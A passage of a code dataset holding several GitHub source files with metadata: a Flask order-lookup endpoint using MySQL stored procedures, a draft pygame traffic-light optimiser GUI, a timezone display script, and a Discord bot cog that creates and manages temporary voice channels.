', methods=['GET'])\ndef handle(session_id, order_id):\n # session_ids are 16 characters long\n if (len(session_id) > 16):\n return '', status.HTTP_400_BAD_REQUEST\n\n connector = mysql.connector.connect(\n user=conf.user,\n database=conf.database,\n passwd=conf.passwd,\n host=conf.host,\n port=conf.port)\n\n answer = {}\n\n cursor = connector.cursor()\n\n return_status = cursor.callproc('get_order', args=[session_id, order_id, 0])\n\n if(return_status[2] == 0):\n # success!\n result = next(cursor.stored_results())\n\n line = next(result)\n\n answer['ordered_on'] = line[0]\n answer['order_total'] = line[1]\n answer['order_status'] = line[2]\n answer['items'] = []\n\n cursor.callproc('get_order_items', args=[order_id])\n\n result = next(cursor.stored_results())\n\n for line in result:\n answer['items']. append({'item_id': line[0], 'amount': line[1]})\n\n return json.dumps(answer, default=str), status.HTTP_200_OK\n elif(return_status[2] == 1 or return_status[2] == 2):\n # user id could not be found or didn't own the order\n connector.close()\n return '', status.HTTP_401_UNAUTHORIZED\n else:\n # oh noes\n connector.close()\n return '', status.HTTP_500_INTERNAL_SERVER_ERROR\n", "repo_name": "qwertxzy/nozama-api", "sub_path": "endpoints/order.py", "file_name": "order.py", "file_ext": "py", "file_size_in_byte": 1531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_400_BAD_REQUEST", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 14, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 16, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 16, "usage_type": "name"}, {"api_name": "conf.user", "line_number": 17, "usage_type": "attribute"}, {"api_name": "conf.database", "line_number": 18, "usage_type": "attribute"}, {"api_name": "conf.passwd", "line_number": 19, "usage_type": "attribute"}, {"api_name": "conf.host", "line_number": 20, "usage_type": "attribute"}, {"api_name": "conf.port", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_200_OK", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 47, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_401_UNAUTHORIZED", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 51, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 55, "usage_type": "name"}]}
+{"seq_id": "40348893038", "text": "import pygame, pickle, sys, time, random, math\nfrom _thread import *\n\nstop_threads=True\npygame.display.init()\npygame.font.init()\n\nredAmber=pygame.image.load(\"TL A R.png\")\nred=pygame.image.load(\"TL R.png\")\namber=pygame.image.load(\"TL A.png\")\ngreen=pygame.image.load(\"TL G.png\")\n\nWIDTH=1200\nHEIGHT=800\nBACKGROUND=pygame.Color(\"#EAEAEA\")\nBLUE=pygame.Color(\"#00A896\")\nORANGE=pygame.Color(\"#89043D\")\nLB=pygame.Color(\"#2FE6DE\")\n\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\n\nstore = {TL:redAmber, Road:roadyBoi}\n\nclass Object(object):\n def __init__(self, x, y, width, height, typ):\n self.typ=typ\n self.x=x\n self.y=y\n self.width=width\n self.height=height\n\n def move(self, x, y, win):\n self.x=x\n self.y=y\n\n def draw(self, win):\n win.blit(redAmber, (self.x+1, self.y))\n pygame.draw.rect(win, self.typ, (self.x, self.y, self.width, self.height), 2)\n\nclass TrafficLight(Object):\n def __init__(self, x, y, timeOn, timeOff, points):\n width=20\n height=20\n Object.__init__(self, x, y, width, height, \"TL\")\n self.x=x\n self.y=y\n self.timeOn=timeOn\n self.timeOff=timeOff\n self.points=points\n\n \ndef drawText(win, text, x, y, size, colour):\n try:\n font = pygame.font.SysFont(\"Comic Sans\", size)\n toBlit = font.render(text, 1, colour, False)\n win.blit(toBlit, ( int( x-(toBlit.get_width()/2) ) , int( y-(toBlit.get_height()/2)) ))\n except:\n print('Font Error, Saw It Coming Ngl')\n\ndef normalMenu(win):\n pygame.draw.rect(win,BLUE, (0, 600, 100, 100), 2)\n drawText(win, \"Lights\", 50, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 600, 100, 100), 2)\n drawText(win, \"Roads\", 150, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 700, 100, 100), 2)\n drawText(win, \"Junctions\", 50, 720, 30, BLUE)\n pygame.draw.rect(win,BLUE, (0, 700, 100, 100), 2)\n drawText(win, \"Other\", 150, 720, 30, BLUE)\n \ndef drawAll(win, listy):\n win.fill(BACKGROUND)\n drawText(win, \"Return To Menu\", 60, 20, 20, BLUE)\n pygame.draw.rect(win,BLUE, (0, 10, 120, 20), 2)\n normalMenu(win)\n \n for i in listy:\n i.draw(win)\n\n pygame.display.flip()\n \ndef main(win):\n print(\"Design Phase Started\")\n pygame.display.set_caption('Design Phase')\n\n itemList=[]\n light=TrafficLight(40, 645, None, None, 0)\n itemList.append(light)\n\n while True:\n drawAll(win, itemList)\n \n mainMenu(win)\n\n\n\n\ndef threaded_title(win, WIDTH, HEIGHT):\n global stop_threads\n while stop_threads:\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE)\n drawText(win, \"Click To Start\", int(WIDTH/2), int(-100+HEIGHT/2), 50, BLUE)\n pygame.display.flip() \n else:\n break\n time.sleep(0.5)\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE) \n pygame.display.flip()\n else:\n break\n time.sleep(0.5)\n print(\"Thread Ended\")\n return\ndef mainMenu(win):\n global stop_threads \n print(\"Running Main Menu\")\n pygame.display.set_caption(\"Reinforcement Learning Traffic Lights\") \n stop_threads=True \n run = True \n clock = pygame.time.Clock() \n start_new_thread(threaded_title, (win, WIDTH, HEIGHT))\n print(\"Thread Started\") \n while run:\n clock.tick(30) \n for event in pygame.event.get():\n if event.type==pygame.QUIT:#Quit\n stop_threads=False\n print(\"Goodbye!\")\n pygame.quit()\n sys.exit()\n if event.type==pygame.MOUSEBUTTONDOWN:\n run = False\n stop_threads=False\n main(win)\nwhile True:\n try:\n mainMenu(win)\n except:\n sys.exit()\n", "repo_name": "BigDataCrackhead/NEA", "sub_path": "Old Versions/V2.py", "file_name": "V2.py", "file_ext": "py", "file_size_in_byte": 4003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.display.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 104, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 111, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 123, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 132, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 134, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 142, "usage_type": "call"}]}
+{"seq_id": "17069256446", "text": "#!/usr/bin/env python3\n\nimport pytz\nfrom datetime import datetime\nfrom random import choice\n\nfrom tabulate import tabulate\n\n\nZONES = {\n 'Cape Town': 'Africa/Johannesburg',\n 'London': 'Europe/London',\n 'Toronto': 'Canada/Eastern',\n 'Kathmandu': 'Asia/Kathmandu',\n 'Nairobi': 'Africa/Nairobi',\n}\nDATE_FORMAT = '%d-%m-%y %H:%M:%S'\nHEADER = ['Location', 'Date', 'Time']\nTABLE_FORMAT = 'pretty'\nTABLE_FORMATS = [\n 'plain',\n 'simple',\n 'github',\n 'grid',\n 'fancy_grid',\n 'pipe',\n 'orgtbl',\n 'jira',\n 'presto',\n 'pretty',\n 'psql',\n]\n\n\ndef main(fmt=None, header=[]):\n table = []\n for label, tz in ZONES.items():\n dt_str = datetime.now(pytz.timezone(tz)).strftime(DATE_FORMAT)\n table.append([label] + dt_str.split())\n\n fmt = fmt or TABLE_FORMAT\n print(tabulate(table, headers=header, tablefmt=fmt))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "joshuaberetta/times", "sub_path": "times.py", "file_name": "times.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 38, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "31093097958", "text": "from __future__ import annotations\nfrom typing import Optional\n\nimport discord\nimport re\nfrom discord import app_commands, utils\nfrom discord.ext import commands, tasks\nfrom collections import defaultdict\nimport json\nimport asyncio\nfrom bot.common import GuildBot, extension_setup\nfrom pathlib import Path\n\n\nclass SquadVoice(commands.Cog):\n data_directory = \"data/squad_voice/\"\n channel_creators_filename = \"channel-creators.json\"\n temporary_channels_filename = \"temporary-channels.json\"\n\n def __init__(self, bot: GuildBot):\n self.bot = bot\n self.channel_creators = {}\n self.all_temporary_channels = {}\n\n self.channel_creators_path = Path(self.data_directory, self.channel_creators_filename).resolve()\n self.temporary_channels_path = Path(self.data_directory, self.temporary_channels_filename).resolve()\n\n self.voice_creator_commands: Optional[app_commands.Group] = None\n self.created_channel_commands: Optional[app_commands.Group] = None\n\n async def cog_load(self) -> None:\n self.create_command_groups()\n self.register_voice_creator_commands_to_group()\n self.register_created_channel_commands_to_group()\n\n Path(self.data_directory).mkdir(exist_ok=True)\n self.channel_creators_path.touch(exist_ok=True)\n self.temporary_channels_path.touch(exist_ok=True)\n\n self.bot.loop.create_task(self.load_from_json())\n\n def cog_unload(self) -> None:\n if self.channel_creators:\n self.dump_channel_creators()\n if self.all_temporary_channels:\n self.dump_temporary_channels()\n\n def dump_channel_creators(self):\n data = [{\"channel_id\": channel_creator.channel.id,\n \"create_name\": channel_creator.create_name,\n \"create_category_id\": channel_creator.create_category.id if channel_creator.create_category else None,\n \"create_user_limit\": channel_creator.create_user_limit}\n for channel_creator in self.channel_creators.values()]\n with open(self.channel_creators_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n def dump_temporary_channels(self):\n data = [{\"channel_id\": temporary_channel.channel.id,\n \"index\": temporary_channel.index,\n \"creator\": temporary_channel.creator.channel.id}\n for temporary_channel in self.all_temporary_channels.values()]\n with open(self.temporary_channels_path, \"w\") as writefile:\n json.dump(data, writefile, indent=2)\n\n async def load_channel_creators_from_json(self):\n await self.bot.wait_until_ready()\n\n with open(self.channel_creators_path, \"r\") as readfile:\n try:\n channel_creators_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.channel_creators = {}\n\n for channel_creator_data in channel_creators_data:\n try:\n channel_creator_data[\"channel\"] = await self.bot.fetch_channel(channel_creator_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n del channel_creator_data[\"channel_id\"]\n if channel_creator_data[\"create_category_id\"]:\n try:\n channel_creator_data[\"create_category\"] = await self.bot.fetch_channel(channel_creator_data[\"create_category_id\"])\n except discord.NotFound:\n channel_creator_data[\"create_category\"] = channel_creator_data[\"channel\"].category\n else:\n channel_creator_data[\"create_category\"] = None\n del channel_creator_data[\"create_category_id\"]\n channel_creator = ChannelCreator(self, **channel_creator_data)\n self.channel_creators[channel_creator.channel.id] = channel_creator\n\n async def load_temporary_channels_from_json(self):\n with open(self.temporary_channels_path, \"r\") as readfile:\n try:\n temporary_channels_data = json.load(readfile)\n except json.decoder.JSONDecodeError:\n return\n\n self.all_temporary_channels = {}\n\n for temporary_channel_data in temporary_channels_data:\n try:\n channel: discord.VoiceChannel = await self.bot.fetch_channel(temporary_channel_data[\"channel_id\"])\n except discord.NotFound:\n continue\n\n if len(channel.members) == 0:\n await channel.delete()\n elif channel and temporary_channel_data[\"creator\"] in self.channel_creators.keys():\n channel_creator = self.channel_creators[temporary_channel_data[\"creator\"]]\n temporary_channel = TemporaryChannel(self, channel_creator,\n temporary_channel_data[\"index\"], channel_creator.create_category,\n channel_creator.create_name, channel_creator.create_user_limit,\n channel)\n await temporary_channel.ready.wait()\n channel_creator.register_temporary_channel(temporary_channel, dump=False)\n\n async def load_from_json(self):\n await self.load_channel_creators_from_json()\n await self.load_temporary_channels_from_json()\n\n self.dump_temporary_channels()\n self.dump_channel_creators()\n\n async def get_temporary_channel(self, interaction: discord.Interaction) -> Optional[TemporaryChannel]:\n voice_state = interaction.user.voice\n if not voice_state:\n await interaction.response.send_message(\"You are not in a voice channel.\", ephemeral=True)\n return None\n\n in_channel = voice_state.channel\n try:\n return self.all_temporary_channels[in_channel.id]\n except KeyError:\n await interaction.response.send_message(\"You are not in a temporary voice channel.\", ephemeral=True)\n return None\n\n async def do_limit_command(self, interaction: discord.Interaction, size, message):\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if size == 0:\n size = None\n elif size < 0:\n await interaction.response.send_message(\"Cannot set negative channel size.\", ephemeral=True)\n return\n\n await temporary_channel.edit(user_limit=size)\n\n await interaction.response.send_message(message % (temporary_channel.channel.mention, size or \"unlimited\"))\n\n async def check_joined_creator_channel(self, user, channel_moved_to):\n if channel_moved_to.channel is None:\n return\n\n try:\n joined_channel_creator = self.channel_creators[channel_moved_to.channel.id]\n except KeyError:\n return\n\n new_temporary_channel = await joined_channel_creator.create_temporary_channel()\n await new_temporary_channel.ready.wait()\n await user.move_to(new_temporary_channel.channel)\n\n async def check_left_temporary_channel(self, channel_moved_from):\n if channel_moved_from.channel is None:\n return\n\n try:\n left_temp_channel = self.all_temporary_channels[channel_moved_from.channel.id]\n except KeyError:\n return\n\n voice_states = channel_moved_from.channel.voice_states\n if len(voice_states) == 0:\n await left_temp_channel.delete()\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, user, before, after):\n if before.channel == after.channel:\n return\n await self.check_joined_creator_channel(user, after)\n await self.check_left_temporary_channel(before)\n\n def create_command_groups(self):\n self.voice_creator_commands = app_commands.Group(name=\"voicecreator\",\n description=\"Incremental Channel Creator Commands.\",\n guild_only=True,\n default_permissions=discord.Permissions(manage_channels=True))\n self.created_channel_commands = app_commands.Group(name=\"voice\",\n description=\"Created Channel Commands.\",\n guild_only=True)\n\n self.__cog_app_commands__.append(self.voice_creator_commands)\n self.__cog_app_commands__.append(self.created_channel_commands)\n\n def register_voice_creator_commands_to_group(self):\n @self.voice_creator_commands.command(name=\"create\")\n @app_commands.rename(category=\"creator_category\",\n create_name=\"created_name\",\n create_category=\"created_category\")\n async def _create_channel_creator(interaction: discord.Interaction,\n name: str,\n category: Optional[discord.CategoryChannel] = None,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Create an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n Name of channel creator.\n category : Optional[discord.CategoryChannel]\n Category to place creator into.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n new_channel_creator_channel = await interaction.guild.create_voice_channel(name=name, category=category)\n self.channel_creators[new_channel_creator_channel.id] = ChannelCreator(self,\n new_channel_creator_channel,\n create_name or name,\n create_category or category,\n user_limit)\n self.dump_channel_creators()\n await interaction.response.send_message(\n f\"Created new incremental channel creator {new_channel_creator_channel.mention} successfully.\")\n\n @self.voice_creator_commands.command(name=\"delete\")\n async def _delete_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel):\n \"\"\"Delete an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to delete.\n \"\"\"\n\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(\n f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n await self.channel_creators[channel.id].delete()\n await interaction.response.send_message(\n f\"Successfully deleted incremental voice channel creator with ID `{channel.id}`\")\n\n @self.voice_creator_commands.command(name=\"edit\")\n @app_commands.rename(create_name=\"created_name\",\n create_category=\"created_category\")\n async def _edit_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Edit an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to edit.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n channel_creator = self.channel_creators[channel.id]\n await channel_creator.edit(create_name, create_category, user_limit)\n await interaction.response.send_message(\n f\"Successfully edited incremental channel creator {channel_creator.channel.mention}\")\n\n def register_created_channel_commands_to_group(self):\n @self.created_channel_commands.command(name=\"resize\")\n @app_commands.checks.cooldown(2, 60)\n async def _resize(interaction: discord.Interaction,\n size: int):\n \"\"\"Resize your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n size : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, size, \"Successfully set %s size to `%s`\")\n\n @self.created_channel_commands.command(name=\"limit\")\n @app_commands.checks.cooldown(2, 60)\n async def _limit(interaction: discord.Interaction,\n limit: int):\n \"\"\"Apply a user limit to your voice channel. 0 removes the limit.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n limit : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, limit, \"Successfully limited %s to `%s`\")\n\n @self.created_channel_commands.command(name=\"unlimit\")\n @app_commands.checks.cooldown(2, 60)\n async def _unlimit(interaction: discord.Interaction):\n \"\"\"Unlimit your voice channel.\"\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n await temporary_channel.edit(user_limit=None)\n\n await interaction.response.send_message(f\"Successfully unlimited {temporary_channel.channel.mention}\")\n\n @self.created_channel_commands.command(name=\"rename\")\n @app_commands.checks.cooldown(2, 60)\n async def _rename(interaction: discord.Interaction,\n name: str):\n \"\"\"Rename your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n New name of the channel.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if re.match(r\"#\\d+\", name.lower().removeprefix(temporary_channel.creator.create_name.lower()).strip()):\n await interaction.response.send_message(\"Please don't use misleading channel names.\", ephemeral=True)\n return\n\n await temporary_channel.edit(name=name)\n\n await interaction.response.send_message(f\"Successfully renamed {temporary_channel.channel.mention}\")\n\n\nclass ChannelCreator:\n def __init__(self, cog: SquadVoice, channel: discord.VoiceChannel, create_name: str,\n create_category: discord.CategoryChannel = None, create_user_limit: int = None):\n self.cog = cog\n self.channel = channel\n self.create_name = create_name\n self.create_category = create_category\n self.create_user_limit = create_user_limit\n self.created_channels = {}\n self.used_indexes = set()\n\n async def delete(self):\n cache = self.created_channels.copy().values()\n for created_channel in cache:\n await created_channel.delete(dump=False)\n self.cog.dump_temporary_channels()\n del cache\n\n await self.channel.delete()\n\n del self.cog.channel_creators[self.channel.id]\n self.cog.dump_channel_creators()\n\n def get_minimum_unused_index(self):\n if len(self.used_indexes) == 0:\n return 1\n minval, maxval = min(self.used_indexes), max(self.used_indexes)\n if len(self.used_indexes) < maxval - minval + 1:\n return min(set(range(minval, maxval + 1)) - self.used_indexes)\n else:\n return len(self.used_indexes) + 1\n\n async def create_temporary_channel(self):\n index = self.get_minimum_unused_index()\n temporary_channel = TemporaryChannel(self.cog, self, index, self.create_category,\n self.create_name, self.create_user_limit)\n await temporary_channel.ready.wait()\n self.register_temporary_channel(temporary_channel)\n\n return temporary_channel\n\n def register_temporary_channel(self, temporary_channel, dump=True):\n self.used_indexes.add(temporary_channel.index)\n self.created_channels[temporary_channel.channel.id] = temporary_channel\n self.cog.all_temporary_channels[temporary_channel.channel.id] = temporary_channel\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, create_name: str = None, create_category: discord.CategoryChannel = None,\n create_user_limit: int = False):\n changed = False\n if create_name is not None:\n self.create_name = create_name\n changed = True\n\n if create_user_limit is not None:\n if create_user_limit <= 0:\n self.create_user_limit = None\n else:\n self.create_user_limit = int(create_user_limit)\n changed = True\n\n if create_category is not None:\n self.create_category = create_category\n\n changed = True\n\n if changed:\n for _, temporary_channel in sorted(self.created_channels.items()):\n await temporary_channel.edit(name=self.create_name, category=self.create_category,\n user_limit=self.create_user_limit)\n\n\nclass TemporaryChannel:\n def __init__(self, cog: SquadVoice, creator: ChannelCreator, index: int,\n category: discord.CategoryChannel, name: str, user_limit: Optional[int] = None,\n channel: discord.VoiceChannel = None):\n self.cog = cog\n self.creator = creator\n self.index = index\n self.name = name\n self.channel = channel\n self.category = category\n self.user_limit = user_limit\n self.edited_recently = defaultdict(lambda: False)\n self.ready = asyncio.Event()\n\n loop = asyncio.get_event_loop()\n loop.create_task(self.ready_up())\n\n async def ready_up(self):\n to_name = self.make_name()\n if not self.channel:\n guild = self.creator.channel.guild\n try:\n assert type(guild) is discord.Guild\n except AssertionError:\n guild = utils.get(self.cog.bot.guilds, id=guild.id)\n\n try:\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n except discord.HTTPException as error:\n if \"Category does not exist\" in str(error):\n self.creator.create_category = self.creator.channel.category\n self.category = self.creator.create_category\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n self.cog.dump_channel_creators()\n else:\n raise error\n\n self.ready.set()\n\n def make_edit_timer(self, time: int, property_name: str):\n async def _job():\n await asyncio.sleep(time)\n self.edited_recently[property_name] = False\n\n self.edited_recently[property_name] = bool(asyncio.create_task(_job()))\n\n def make_name(self):\n if self.name == self.creator.create_name:\n return f\"{self.name} #{str(self.index)}\"\n else:\n return self.name\n\n async def delete(self, dump=True):\n\n await self.channel.delete()\n\n self.creator.used_indexes.remove(self.index)\n\n del self.creator.created_channels[self.channel.id]\n del self.cog.all_temporary_channels[self.channel.id]\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, index: int = None, category: discord.CategoryChannel = False, name: str = None,\n user_limit: Optional[int] or bool = False) -> None:\n\n changed = False\n if index:\n self.index = index\n changed = True\n\n if category or category is None:\n self.category = category\n changed = True\n\n if name:\n self.name = name\n changed = True\n\n if user_limit or user_limit is None:\n self.user_limit = user_limit\n changed = True\n\n if changed:\n await self.channel.edit(name=self.make_name(), category=self.category,\n user_limit=self.user_limit if self.user_limit is not None else 0)\n\n\nsetup = extension_setup(SquadVoice)\n", "repo_name": "Lordfirespeed/Centrifuge", "sub_path": "bot/cogs/squad_voice.py", "file_name": "squad_voice.py", "file_ext": "py", "file_size_in_byte": 22581, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 15, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, {"api_name": "bot.common.GuildBot", "line_number": 20, "usage_type": "name"}, {"api_name": "bot.common", "line_number": 21, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 25, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 28, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 29, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 63, "usage_type": "call"}, {"api_name": "json.load", "line_number": 70, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 71, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 79, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 86, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 98, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 105, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 106, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 127, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 140, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 181, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 181, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 181, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 189, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 189, "usage_type": "name"}, {"api_name": "discord.Permissions", "line_number": 192, "usage_type": "call"}, {"api_name": "discord.app_commands.Group", "line_number": 193, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 193, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 205, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 207, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 207, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 209, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 209, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 210, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 202, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 202, "usage_type": "name"}, 